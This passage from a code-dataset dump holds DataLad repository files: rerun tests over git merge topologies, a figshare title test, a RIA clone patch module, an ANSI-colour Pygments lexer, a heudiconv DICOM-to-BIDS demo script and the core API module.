branch\n@skip_if_adjusted_branch\n@with_tempfile(mkdir=True)\ndef test_rerun_mutator_left_nonrun_right(path=None):\n ds = Dataset(path).create()\n # keep direct repo accessor to speed things up\n ds_repo = ds.repo\n ds.run(\"echo foo >>foo\")\n ds_repo.checkout(DEFAULT_BRANCH + \"~\", options=[\"-b\", \"side\"])\n with open(op.join(path, \"nonrun-file\"), \"w\") as f:\n f.write(\"blah\")\n ds.save()\n ds_repo.checkout(DEFAULT_BRANCH)\n ds_repo.merge(\"side\", options=[\"-m\", \"Merge side\"])\n # o d_n\n # |\\\n # | o c_n\n # o | b_r\n # |/\n # o a_n\n\n hexsha_before = ds_repo.get_hexsha()\n ds.rerun(since=\"\")\n # o b_R\n # o d_n\n # |\\\n # | o c_n\n # o | b_r\n # |/\n # o a_n\n assert_false(ds_repo.commit_exists(DEFAULT_BRANCH + \"^2\"))\n eq_(hexsha_before,\n ds_repo.get_hexsha(DEFAULT_BRANCH + \"^\"))\n\n\n@slow\n# test implementation requires checkout of non-adjusted branch\n@skip_if_adjusted_branch\n@with_tempfile(mkdir=True)\ndef test_rerun_mutator_stem_nonrun_merges(path=None):\n ds = Dataset(path).create()\n # keep direct repo accessor to speed things up\n ds_repo = ds.repo\n ds.run(\"echo foo >>foo\")\n with open(op.join(path, \"nonrun-file0\"), \"w\") as f:\n f.write(\"blah\")\n ds.save()\n ds_repo.checkout(DEFAULT_BRANCH + \"~\", options=[\"-b\", \"side\"])\n with open(op.join(path, \"nonrun-file1\"), \"w\") as f:\n f.write(\"more blah\")\n ds.save()\n ds_repo.checkout(DEFAULT_BRANCH)\n ds_repo.merge(\"side\", options=[\"-m\", \"Merge side\"])\n # o e_n\n # |\\\n # | o d_n\n # o | c_n\n # |/\n # o b_r\n # o a_n\n\n ds.rerun(since=\"\", onto=\"\")\n # o e_M\n # |\\\n # | o d_C\n # o | c_C\n # |/\n # o b_R\n # o a_n\n ok_(ds_repo.commit_exists(\"HEAD^2\"))\n neq_(ds_repo.get_hexsha(DEFAULT_BRANCH),\n ds_repo.get_hexsha())\n\n ds_repo.checkout(DEFAULT_BRANCH)\n ds.rerun(since=\"\", onto=DEFAULT_BRANCH + \"^2\")\n # o c_C\n # o b_R\n # o d_n\n # o b_r\n # o a_n\n assert_false(ds_repo.commit_exists(\"HEAD^2\"))\n eq_(ds_repo.get_hexsha(\"HEAD~2\"),\n ds_repo.get_hexsha(DEFAULT_BRANCH + \"^2\"))\n\n ds_repo.checkout(DEFAULT_BRANCH)\n hexsha_before = ds_repo.get_hexsha()\n ds.rerun(since=\"\")\n # o b_R\n # o e_n\n # |\\\n # | o d_n\n # o | c_n\n # |/\n # o b_r\n # o a_n\n eq_(hexsha_before,\n ds_repo.get_hexsha(DEFAULT_BRANCH + \"^\"))\n assert_false(ds_repo.commit_exists(\"HEAD^2\"))\n\n\n# @slow # ~4.5sec\n# test implementation requires checkout of non-adjusted branch\n@skip_if_adjusted_branch\n@with_tempfile(mkdir=True)\ndef test_rerun_exclude_side(path=None):\n ds = Dataset(path).create()\n # keep direct repo accessor to speed things up\n ds_repo = ds.repo\n ds_repo.checkout(DEFAULT_BRANCH, options=[\"-b\", \"side\"])\n ds.run(\"echo foo >foo\")\n ds_repo.checkout(DEFAULT_BRANCH)\n ds.run(\"echo bar >bar\")\n ds_repo.merge(\"side\", options=[\"-m\", \"Merge side\"])\n # o d_n\n # |\\\n # o | c_r\n # | o b_r\n # |/\n # o a_n\n\n ds.rerun(\"HEAD\", since=DEFAULT_BRANCH + \"^2\", onto=\"\")\n # o d_M\n # |\\\n # o | c_R\n # | o b_r\n # |/\n # o a_n\n neq_(ds_repo.get_hexsha(DEFAULT_BRANCH),\n ds_repo.get_hexsha())\n neq_(ds_repo.get_hexsha(DEFAULT_BRANCH + \"^\"),\n ds_repo.get_hexsha(\"HEAD^\"))\n eq_(ds_repo.get_hexsha(DEFAULT_BRANCH + \"^2\"),\n ds_repo.get_hexsha(\"HEAD^2\"))\n\n\n@slow\n# test implementation requires checkout of non-adjusted branch\n@skip_if_adjusted_branch\n@with_tempfile(mkdir=True)\ndef test_rerun_unrelated_run_left_nonrun_right(path=None):\n ds = Dataset(path).create()\n # keep direct repo accessor to speed things up\n ds_repo = ds.repo\n ds.run(\"echo foo >foo\")\n ds_repo.checkout(DEFAULT_BRANCH + \"~\", options=[\"--orphan\", \"side\"])\n ds.save(message=\"squashed\")\n ds_repo.checkout(DEFAULT_BRANCH)\n ds_repo.merge(\"side\",\n options=[\"-m\", \"Merge side\", \"--allow-unrelated-histories\"])\n # o d_n\n # |\\\n # | o c_n\n # o b_r\n # o a_n\n\n ds.rerun(since=\"\", onto=\"\")\n # o d_M\n # |\\\n # | o c_n\n # o b_R\n # o a_n\n neq_(ds_repo.get_hexsha(\"HEAD^\"),\n ds_repo.get_hexsha(DEFAULT_BRANCH + \"^\"))\n eq_(ds_repo.get_hexsha(\"HEAD^2\"),\n ds_repo.get_hexsha(DEFAULT_BRANCH + \"^2\"))\n assert_false(ds_repo.commit_exists(\"HEAD^2^\"))\n\n ds_repo.checkout(DEFAULT_BRANCH)\n ds.rerun(since=\"\", onto=DEFAULT_BRANCH + \"^2\")\n # o b_R\n # o c_n\n assert_false(ds_repo.commit_exists(\"HEAD^2\"))\n eq_(ds_repo.get_hexsha(\"HEAD^\"),\n ds_repo.get_hexsha(DEFAULT_BRANCH + \"^2\"))\n\n ds_repo.checkout(DEFAULT_BRANCH)\n ds.rerun(since=\"\")\n # o d_n\n # |\\\n # | o c_n\n # o b_r\n # o a_n\n eq_(ds_repo.get_hexsha(DEFAULT_BRANCH),\n ds_repo.get_hexsha())\n\n\n# @slow # ~3.5sec on Yarik's laptop\n# test implementation requires checkout of non-adjusted branch\n@skip_if_adjusted_branch\n@with_tempfile(mkdir=True)\ndef test_rerun_unrelated_mutator_left_nonrun_right(path=None):\n ds = Dataset(path).create()\n # keep direct repo accessor to speed things up\n ds_repo = ds.repo\n ds.run(\"echo foo >>foo\")\n ds_repo.checkout(DEFAULT_BRANCH + \"~\", options=[\"--orphan\", \"side\"])\n ds.save(message=\"squashed\")\n ds_repo.checkout(DEFAULT_BRANCH)\n ds_repo.merge(\"side\",\n options=[\"-m\", \"Merge side\", \"--allow-unrelated-histories\"])\n # o d_n\n # |\\\n # | o c_n\n # o b_r\n # o a_n\n\n hexsha_before = ds_repo.get_hexsha()\n ds.rerun(since=\"\")\n # o b_R\n # o d_n\n # |\\\n # | o c_n\n # o b_r\n # o a_n\n eq_(hexsha_before,\n ds_repo.get_hexsha(DEFAULT_BRANCH + \"^\"))\n\n\n@slow\n@with_tempfile(mkdir=True)\ndef test_rerun_unrelated_nonrun_left_run_right(path=None):\n ds = Dataset(path).create()\n # keep direct repo accessor to speed things up\n ds_repo = ds.repo\n ds_repo.checkout(DEFAULT_BRANCH, options=[\"--orphan\", \"side\"])\n ds.save(message=\"squashed\")\n ds.run(\"echo foo >foo\")\n ds_repo.checkout(DEFAULT_BRANCH)\n ds_repo.merge(\"side\",\n options=[\"-m\", \"Merge side\", \"--allow-unrelated-histories\"])\n # o d_n\n # |\\\n # | o c_r\n # | o b_n\n # o a_n\n\n ds.rerun(since=\"\", onto=\"\")\n # o d_M\n # |\\\n # | o c_R\n # | o b_n\n # o a_n\n ok_(ds_repo.commit_exists(\"HEAD^2\"))\n neq_(ds_repo.get_hexsha(DEFAULT_BRANCH),\n ds_repo.get_hexsha())\n eq_(ds_repo.get_hexsha(DEFAULT_BRANCH + \"^\"),\n ds_repo.get_hexsha(\"HEAD^\"))\n eq_(ds_repo.get_hexsha(DEFAULT_BRANCH + \"^2^\"),\n ds_repo.get_hexsha(\"HEAD^2^\"))\n assert_false(ds_repo.commit_exists(\"HEAD^2^^\"))\n\n ds_repo.checkout(DEFAULT_BRANCH)\n ds.rerun(since=\"\", onto=DEFAULT_BRANCH + \"^2\")\n # o d_n\n # |\\\n # | o c_r\n # | o b_n\n # o a_n\n eq_(ds_repo.get_hexsha(DEFAULT_BRANCH),\n ds_repo.get_hexsha())\n assert_false(ds_repo.commit_exists(\"HEAD^2^^\"))\n\n ds_repo.checkout(DEFAULT_BRANCH)\n hexsha_before = ds_repo.get_hexsha()\n ds.rerun(since=\"\")\n # o d_n\n # |\\\n # | o c_r\n # | o b_n\n # o a_n\n eq_(hexsha_before, ds_repo.get_hexsha())\n\n\n@slow\n# test implementation requires checkout of non-adjusted branch\n@skip_if_adjusted_branch\n@with_tempfile(mkdir=True)\ndef test_rerun_unrelated_nonrun_left_mutator_right(path=None):\n ds = Dataset(path).create()\n # keep direct repo accessor to speed things up\n ds_repo = ds.repo\n ds_repo.checkout(DEFAULT_BRANCH, options=[\"--orphan\", \"side\"])\n ds.save(message=\"squashed\")\n ds.run(\"echo foo >>foo\")\n ds_repo.checkout(DEFAULT_BRANCH)\n ds_repo.merge(\"side\",\n options=[\"-m\", \"Merge side\", \"--allow-unrelated-histories\"])\n # o d_n\n # |\\\n # | o c_r\n # | o b_n\n # o a_n\n\n ds.rerun(since=\"\", onto=DEFAULT_BRANCH + \"^2\")\n # o d_M\n # |\\\n # | o c_R\n # | o c_r\n # | o b_n\n # o a_n\n eq_(ds_repo.get_hexsha(\"HEAD^2^\"),\n ds_repo.get_hexsha(DEFAULT_BRANCH + \"^2\"))\n assert_false(ds_repo.commit_exists(\"HEAD^2~3\"))\n\n ds_repo.checkout(DEFAULT_BRANCH)\n hexsha_before = ds_repo.get_hexsha()\n ds.rerun(since=\"\")\n # o c_R\n # o d_n\n # |\\\n # | o c_r\n # | o b_n\n # o a_n\n eq_(ds_repo.get_hexsha(\"HEAD^\"),\n hexsha_before)\n assert_false(ds_repo.commit_exists(\"HEAD^2\"))\n\n\n@slow\n# test implementation requires checkout of non-adjusted branch\n@skip_if_adjusted_branch\n@with_tempfile(mkdir=True)\ndef test_rerun_multifork(path=None):\n ds = Dataset(path).create()\n # keep direct repo accessor to speed things up\n ds_repo = ds.repo\n ds_repo.checkout(DEFAULT_BRANCH, options=[\"-b\", \"side\"])\n ds.run(\"echo foo >foo\")\n ds_repo.checkout(\"side\", options=[\"-b\", \"side-nonrun\"])\n with open(op.join(path, \"nonrun-file0\"), \"w\") as f:\n f.write(\"blah 0\")\n ds.save()\n ds_repo.checkout(\"side\")\n with open(op.join(path, \"nonrun-file1\"), \"w\") as f:\n f.write(\"blah 1\")\n ds.save()\n ds.run(\"echo bar >bar\")\n ds_repo.checkout(\"side~1\", options=[\"-b\", \"side-side\"])\n with open(op.join(path, \"nonrun-file2\"), \"w\") as f:\n f.write(\"blah 2\")\n ds.save()\n ds.run(\"echo onside0 >onside0\")\n ds_repo.checkout(\"side\")\n ds_repo.merge(\"side-side\")\n ds.run(\"echo after-side-side >after-side-side\")\n ds_repo.checkout(DEFAULT_BRANCH)\n ds_repo.merge(\"side\", options=[\"--no-ff\"])\n ds_repo.merge(\"side-nonrun\")\n # o k_n\n # |\\\n # | o j_n\n # o | i_n\n # |\\ \\\n # | o | h_r\n # | o | g_n\n # | |\\ \\\n # | | o | f_r\n # | | o | e_n\n # | o | | d_r\n # | |/ /\n # | o | c_n\n # | |/\n # | o b_r\n # |/\n # o a_n\n\n ds.rerun(since=\"\", onto=\"\")\n # o k_M\n # |\\\n # | o j_n\n # o | i_M\n # |\\ \\\n # | o | h_R\n # | o | g_M\n # | |\\ \\\n # | | o | f_R\n # | | o | e_n\n # | o | | d_R\n # | |/ /\n # | o | c_n\n # | |/\n # | o b_R\n # |/\n # o a_n\n eq_(ds_repo.get_hexsha(\"HEAD~2\"),\n ds_repo.get_hexsha(DEFAULT_BRANCH + \"~2\"))\n neq_(ds_repo.get_hexsha(\"HEAD^2\"),\n ds_repo.get_hexsha(DEFAULT_BRANCH + \"^2\"))\n neq_(ds_repo.get_hexsha(\"HEAD^^2\"),\n ds_repo.get_hexsha(DEFAULT_BRANCH + \"^^2\"))\n assert_false(ds_repo.commit_exists(\"HEAD^^2^2\"))\n eq_(ds_repo.get_hexsha(\"HEAD^2^^\"),\n ds_repo.get_hexsha(DEFAULT_BRANCH + \"^2^^\"))\n\n ds_repo.checkout(DEFAULT_BRANCH)\n hexsha_before = ds_repo.get_hexsha()\n ds.rerun(since=\"\")\n eq_(hexsha_before, ds_repo.get_hexsha())\n\n\n@slow\n# test implementation requires checkout of non-adjusted branch\n@skip_if_adjusted_branch\n@with_tempfile(mkdir=True)\ndef test_rerun_octopus(path=None):\n ds = Dataset(path).create()\n # keep direct repo accessor to speed things up\n ds_repo = ds.repo\n ds.run(\"echo foo >>foo\")\n with open(op.join(ds.path, \"non-run\"), \"w\") as nrfh:\n nrfh.write(\"non-run\")\n ds.save()\n ds_repo.checkout(DEFAULT_BRANCH + \"~\", options=[\"-b\", \"topic-1\"])\n ds.run(\"echo bar >bar\")\n ds_repo.checkout(DEFAULT_BRANCH + \"~\", options=[\"-b\", \"topic-2\"])\n ds.run(\"echo baz >baz\")\n ds_repo.checkout(DEFAULT_BRANCH)\n ds_repo.call_git(\n [\"merge\", \"-m\", \"Merge octopus\", \"topic-1\", \"topic-2\"])\n # o-. f_M\n # |\\ \\\n # | | o e_r\n # | o | d_r\n # | |/\n # o | c_n\n # |/\n # o b_r\n # o a_n\n\n ds.rerun(since=\"\", onto=\"\")\n neq_(ds_repo.get_hexsha(\"HEAD^3\"),\n ds_repo.get_hexsha(DEFAULT_BRANCH + \"^3\"))\n eq_(ds_repo.get_hexsha(\"HEAD~3\"),\n ds_repo.get_hexsha(DEFAULT_BRANCH + \"~3\"))\n\n ds_repo.checkout(DEFAULT_BRANCH)\n hexsha_before = ds_repo.get_hexsha()\n ds.rerun(since=\"\")\n eq_(hexsha_before,\n ds_repo.get_hexsha(DEFAULT_BRANCH + \"~\"))\n" }, { "alpha_fraction": 0.5803374648094177, "alphanum_fraction": 0.5906089544296265, "avg_line_length": 31.452381134033203, "blob_id": "2d281421c83ef077a1e69c3903da306d10e27d89", "content_id": "2ec5b26ba01a02d2edcac016ccb82e4a0aebcd6b", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1363, "license_type": "permissive", "max_line_length": 92, "num_lines": 42, "path": "/datalad/distributed/tests/test_export_to_figshare.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# -*- coding: utf-8 -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test export_to_figshare\"\"\"\n\nfrom datalad.api import (\n Dataset,\n export_archive,\n)\nfrom datalad.support import path as op\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.tests.utils_pytest import (\n eq_,\n with_tree,\n)\n\nfrom ..export_to_figshare import _get_default_title\n\n\n@with_tree({})\ndef test_get_default_title(path=None):\n repo = GitRepo(path)\n ds = Dataset(path)\n # There is no dataset initialized yet, so only path will be the title\n dirname = op.basename(path)\n eq_(_get_default_title(ds), dirname)\n\n # Initialize and get UUID\n ds.create(force=True)\n eq_(_get_default_title(ds), '{dirname}#{ds.id}'.format(**locals()))\n\n # Tag and get @version\n # cannot use ds.save since our tags are not annotated,\n # see https://github.com/datalad/datalad/issues/4139\n ds.repo.tag(\"0.1\", message=\"important version\")\n eq_(_get_default_title(ds), '{dirname}#{ds.id}@0.1'.format(**locals()))\n" }, { "alpha_fraction": 0.6597825884819031, "alphanum_fraction": 0.6597825884819031, "avg_line_length": 25.66666603088379, "blob_id": "490863793c1bd0809d9d848c37a4b306a379a100", "content_id": "c78cc99b9a741fddcc567725851adc69b51ff3c6", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1840, "license_type": "permissive", "max_line_length": 78, "num_lines": 69, "path": "/datalad/core/distributed/clone_ria.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "\"\"\"\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport logging\nfrom typing import Dict\n\nfrom datalad.distribution.dataset import Dataset\n# For now kept in clone_utils, to avoid circular import (see datalad-next)\nfrom .clone_utils import (\n postclone_preannex_cfg_ria,\n postclonecfg_ria,\n)\n\nfrom . import clone as mod_clone\n\n# we need to preserve the original functions to be able to call them\n# in the patch\norig_post_git_init_processing_ = mod_clone._post_git_init_processing_\norig_pre_final_processing_ = mod_clone._pre_final_processing_\n\n\nlgr = logging.getLogger('datalad.core.distributed.clone')\n\n\ndef _post_git_init_processing_(\n *,\n destds: Dataset,\n gitclonerec: Dict,\n remote: str,\n **kwargs\n):\n yield from orig_post_git_init_processing_(\n destds=destds, gitclonerec=gitclonerec, remote=remote,\n **kwargs)\n\n # In case of RIA stores we need to prepare *before* annex is called at all\n if gitclonerec['type'] == 'ria':\n postclone_preannex_cfg_ria(destds, remote=remote)\n\n\ndef _pre_final_processing_(\n *,\n destds: Dataset,\n gitclonerec: Dict,\n remote: str,\n **kwargs\n):\n if gitclonerec['type'] == 'ria':\n yield from postclonecfg_ria(destds, gitclonerec,\n remote=remote)\n\n yield from orig_pre_final_processing_(\n destds=destds, gitclonerec=gitclonerec, remote=remote,\n **kwargs)\n\n\ndef _apply():\n # apply patch in a function, to be able to easily patch it out\n # and turn off the patch\n lgr.debug(\n 'Apply RIA patch to clone.py:_post_git_init_processing_')\n mod_clone._post_git_init_processing_ = _post_git_init_processing_\n lgr.debug(\n 'Apply RIA patch to clone.py:_pre_final_processing_')\n mod_clone._pre_final_processing_ = _pre_final_processing_\n\n\n_apply()\n" }, { "alpha_fraction": 0.5038935542106628, "alphanum_fraction": 0.5137897729873657, "avg_line_length": 31.44210433959961, "blob_id": "7f24a7a4798074ad91c40448abffe25afd6c8ad5", "content_id": "205f4dedcd3eda6cf819dc80460801a893a7a450", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6164, "license_type": "permissive", "max_line_length": 79, "num_lines": 190, "path": "/docs/utils/pygments_ansi_color.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"Pygments lexer for text containing ANSI color codes.\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import unicode_literals\n\nimport itertools\nimport re\n\nimport pygments.lexer\nimport pygments.token\n\n\nColor = pygments.token.Token.Color\n\n_ansi_code_to_color = {\n 0: 'Black',\n 1: 'Red',\n 2: 'Green',\n 3: 'Yellow',\n 4: 'Blue',\n 5: 'Magenta',\n 6: 'Cyan',\n 7: 'White',\n}\n\n\ndef _token_from_lexer_state(bold, fg_color, bg_color):\n \"\"\"Construct a token given the current lexer state.\n\n We can only emit one token even though we have a multiple-tuple state.\n To do work around this, we construct tokens like \"BoldRed\".\n \"\"\"\n token_name = ''\n\n if bold:\n token_name += 'Bold'\n\n if fg_color:\n token_name += fg_color\n\n if bg_color:\n token_name += 'BG' + bg_color\n\n if token_name == '':\n return pygments.token.Text\n else:\n return getattr(Color, token_name)\n\n\ndef color_tokens(fg_colors, bg_colors):\n \"\"\"Return color tokens for a given set of colors.\n\n Pygments doesn't have a generic \"color\" token; instead everything is\n contextual (e.g. \"comment\" or \"variable\"). That doesn't make sense for us,\n where the colors actually *are* what we care about.\n\n This function will register combinations of tokens (things like \"Red\" or\n \"BoldRedBGGreen\") based on the colors passed in.\n\n You can also define the tokens yourself, but note that the token names are\n *not* currently guaranteed to be stable between releases as I'm not really\n happy with this approach.\n\n Usage:\n\n fg_colors = bg_colors = {\n 'Black': '#000000',\n 'Red': '#EF2929',\n 'Green': '#8AE234',\n 'Yellow': '#FCE94F',\n 'Blue': '#3465A4',\n 'Magenta': '#c509c5',\n 'Cyan': '#34E2E2',\n 'White': '#ffffff',\n }\n class MyStyle(pygments.styles.SomeStyle):\n styles = dict(pygments.styles.SomeStyle.styles)\n styles.update(color_tokens(fg_colors, bg_colors))\n \"\"\"\n styles = {}\n\n for bold, fg_color, bg_color in itertools.product(\n (False, True),\n {None} | set(fg_colors),\n {None} | set(bg_colors),\n ):\n token = _token_from_lexer_state(bold, fg_color, bg_color)\n if token is not pygments.token.Text:\n value = []\n if bold:\n value.append('bold')\n if fg_color:\n value.append(fg_colors[fg_color])\n if bg_color:\n value.append('bg:' + bg_colors[bg_color])\n styles[token] = ' '.join(value)\n\n return styles\n\n\nclass AnsiColorLexer(pygments.lexer.RegexLexer):\n name = 'ANSI Color'\n aliases = ('ansi-color', 'ansi', 'ansi-terminal')\n flags = re.DOTALL | re.MULTILINE\n\n def __init__(self, *args, **kwargs):\n super(AnsiColorLexer, self).__init__(*args, **kwargs)\n self.reset_state()\n\n def reset_state(self):\n self.bold = False\n self.fg_color = None\n self.bg_color = None\n\n @property\n def current_token(self):\n return _token_from_lexer_state(\n self.bold, self.fg_color, self.bg_color,\n )\n\n def process(self, match):\n \"\"\"Produce the next token and bit of text.\n\n Interprets the ANSI code (which may be a color code or some other\n code), changing the lexer state and producing a new token. If it's not\n a color code, we just strip it out and move on.\n\n Some useful reference for ANSI codes:\n * http://ascii-table.com/ansi-escape-sequences.php\n \"\"\"\n # \"after_escape\" contains everything after the start of the escape\n # sequence, up to the next escape sequence. We still need to separate\n # the content from the end of the escape sequence.\n after_escape = match.group(1)\n\n # TODO: this doesn't handle the case where the values are non-numeric.\n # This is rare but can happen for keyboard remapping, e.g.\n # '\\x1b[0;59;\"A\"p'\n parsed = re.match(\n r'([0-9;=]*?)?([a-zA-Z])(.*)$',\n after_escape,\n re.DOTALL | re.MULTILINE,\n )\n if parsed is None:\n # This shouldn't ever happen if we're given valid text + ANSI, but\n # people can provide us with utter junk, and we should tolerate it.\n text = after_escape\n else:\n value, code, text = parsed.groups()\n\n if code == 'm': # \"m\" is \"Set Graphics Mode\"\n # Special case \\x1b[m is a reset code\n if value == '':\n self.reset_state()\n else:\n values = value.split(';')\n for value in values:\n try:\n value = int(value)\n except ValueError:\n # Shouldn't ever happen, but could with invalid\n # ANSI.\n continue\n else:\n fg_color = _ansi_code_to_color.get(value - 30)\n bg_color = _ansi_code_to_color.get(value - 40)\n if fg_color:\n self.fg_color = fg_color\n elif bg_color:\n self.bg_color = bg_color\n elif value == 1:\n self.bold = True\n elif value == 22:\n self.bold = False\n elif value == 39:\n self.fg_color = None\n elif value == 49:\n self.bg_color = None\n elif value == 0:\n self.reset_state()\n\n yield match.start(), self.current_token, text\n\n tokens = {\n # states have to be native strings\n str('root'): [\n (r'\\x1b\\[([^\\x1b]*)', process),\n (r'[^\\x1b]+', pygments.token.Text),\n ],\n }\n" }, { "alpha_fraction": 0.7732600569725037, "alphanum_fraction": 0.7851648330688477, "avg_line_length": 83, "blob_id": "12b0302fa6a5e7d83e3c075561a787010eb8fac9", "content_id": "2b86628c7f80275d0a2d60c6db47b20b3946a164", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 5460, "license_type": "permissive", "max_line_length": 312, "num_lines": 65, "path": "/docs/casts/heudiconv_dicom_to_bids.sh", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "full_title=\"Demo of automatic conversion of DICOMs into BIDS and managing data using DataLad\"\nrun \"set -eu # Fail early if any error happens\"\nsay \"Heudiconv (Heuristic DICOM Converter, https://github.com/nipy/heudiconv) now allows to create DataLad datasets with your neuroimaging data as soon as it comes from the MRI scanner.\"\n\nsay \"In this example we will use a heudiconv heuristic developed and used at DBIC (Dartmouth Brain Imaging Center) to have all collected data made available as BIDS datasets. See http://goo.gl/WEoCge describing the naming convention.\"\n\nsay \"We will demonstrate it on some data acquired on a phantom, mimicking multiple studies/subjects/sessions setup, and already available through datalad:\"\nrun \"datalad install -r -g -J4 ///dicoms/dartmouth-phantoms/bids_test4-20161014\"\nsay \"We will now run heudiconv pointing to DBIC heuristic on data for the first five sessions (could be done one scanning session at a time, or entire directory as well), while instructing heudiconv to place produced data under DataLad control.\"\nsay \"First we will download the heuristic file from heudiconv's repository:\"\nrun \"wget https://raw.githubusercontent.com/nipy/heudiconv/master/heuristics/dbic_bids.py\"\n\nsay \"and then run heudiconv instructing to process multiple sessions, and place all converted data under a dataset called 'demo' (for the purpose of the demo we will convert only all anatomicals):\"\nrun \"heudiconv --bids --datalad -f ./dbic_bids.py -o demo bids_test4-20161014/phantom-[1-5]/*{scout,T1w}*\"\n\nsay \"Heudiconv has created a hierarchy of DataLad datasets, with levels PI/Researcher/study\"\nrun \"datalad ls -r demo\"\n\nsay \"where separate scanning sessions detected by heudiconv were contributed as separate commits to the sub-dataset corresponding to the specific study (as discovered from 'Study Description' field in DICOM):\"\nrun \"cd demo/Halchenko/Yarik/950_bids_test4\"\nrun \"git log --pretty=oneline\"\n\nsay \"Not only that all DICOMs were converted into a BIDS-compliant dataset, this heuristic also provided templates for mandatory files in BIDS format, some of which were placed directly under git to ease modification and integration of changes:\"\nrun \"cat dataset_description.json\"\nsay \"and you can easily find files/fields which need adjustment with information only you might know (design, author, license, etc) by searching for TODO\"\nrun \"git grep TODO\"\nsay \"All binary data and otherwise 'sensitive' files (e.g. _scans.tsv files) where placed under git-annex control:\"\nrun \"git annex list\"\n\nsay \"Original DICOMS, converted anatomicals (which are not yet defaced), and _scans.tsv files also obtained a meta-data tag to allow easy identification of data which did not go through anonimization step yet and might potentially contain subject-identifying information:\"\nrun \"datalad metadata sourcedata/sub-phantom1sid1\"\n\nsay \"These datasets are ready to be installed from this location to the processing box. In the demo we will just perform it on the localhost and only for the current study since sub-datasets are independent of their supers:\"\nrun 'datalad install -g -r -s localhost:$PWD ~/950_bids_test4-process'\nrun \"cd ~/950_bids_test4-process\"\n\nsay \"Data now could be processed/analyzed/etc in this dataset 'sibling'.\"\n\nsay \"According to BIDS derivative (e.g. preprocessed) data should reside under derivatives/, so we create a new subdataset\"\nrun \"datalad create -d . derivatives/preprocess1\"\nsay \"and do our thorough preprocessing (see http://bids-apps.neuroimaging.io for ready to use pipelines like mriqc and fmriprep), in our case a sample brain extraction:\"\nrun \"source /etc/fsl/fsl.sh # to enable FSL on NeuroDebian systems\"\nrun \"mkdir -p derivatives/preprocess1/sub-phantom1sid1/ses-localizer/anat/ # create target output directory\"\nrun \"bet {,derivatives/preprocess1/}sub-phantom1sid1/ses-localizer/anat/sub-phantom1sid1_ses-localizer_T1w.nii.gz\"\n\nsay \"To keep control over the versions of all data we work with, we add results of pre-processing under DataLad version control\"\nrun \"datalad save -m 'added initial preprocessing (well -- BETing output)' derivatives/preprocess1/*\"\nsay \"and then also adjust meta-data templates heudiconv pre-generated for us:\"\nrun \"sed -i -e 's,First1 Last1,Data Lad,g' -e '/TODO/d' dataset_description.json\"\nsay \"We save all so far accumulated changes\"\nrun \"datalad save -m 'Finished initial preprocessing, specified PI in dataset description and removed TODOs.'\"\n\nsay \"Whenever more data is acquired, heudiconv conversion could be ran again to complement previously acquired datasets with new data.\"\nrun \"cd\"\nrun \"heudiconv --bids --datalad -f ./dbic_bids.py -o demo bids_test4-20161014/phantom-[6-9]/*{scout,T1w}*\"\n\nsay \"Now we can go to the processing 'box' again and update the entire hierarchy (in our case actually just one but we could have cloned entire tree for a PI) of the datasets while incorporating with possible changes already done on the processing box, while git would track the entire history of modifications.\"\nrun \"cd ~/950_bids_test4-process\"\nrun \"datalad update --merge -r\"\nrun \"git status # all clear\"\nrun \"cat dataset_description.json # and our changes are still in place\"\nsay \"Now you could process newly acquired data... rinse repeat, while keeping the full history of actions:\"\nrun \"git log --pretty=oneline\"\n\nsay \"See also demos on how data could be exported and/or published whenever you are ready to share it publicly or with your collaborators.\"\n" }, { "alpha_fraction": 0.6126071214675903, "alphanum_fraction": 0.616891086101532, "avg_line_length": 35.31111145019531, "blob_id": "41f196400e07289ac88d20bbe279f4b9c433b83a", "content_id": "e575c153886143ecf7c15bfbbced464c911e916c", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1634, "license_type": "permissive", "max_line_length": 87, "num_lines": 45, "path": "/datalad/coreapi.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Python DataLad core API exposing essential command used by other DataLad commands\"\"\"\n\n# Should have no spurious imports/definitions at the module level\nfrom .distribution.dataset import Dataset\n\n\ndef _generate_func_api():\n \"\"\"Auto detect all available interfaces and generate a function-based\n API from them\n \"\"\"\n from importlib import import_module\n\n # load extensions requested by configuration\n import datalad\n if datalad.get_apimode() == 'python':\n # only do this in Python API mode, because the CLI main\n # will have done this already\n from datalad.support.entrypoints import load_extensions\n load_extensions()\n\n from .interface.base import get_interface_groups\n from .interface.base import get_api_name\n\n for grp_name, grp_descr, interfaces in get_interface_groups():\n for intfspec in interfaces:\n # turn the interface spec into an instance\n mod = import_module(intfspec[0], package='datalad')\n intf = getattr(mod, intfspec[1])\n api_name = get_api_name(intfspec)\n globals()[api_name] = intf.__call__\n\n\n# Invoke above helper\n_generate_func_api()\n\n# Be nice and clean up the namespace properly\ndel _generate_func_api\n" }, { "alpha_fraction": 0.6406118869781494, 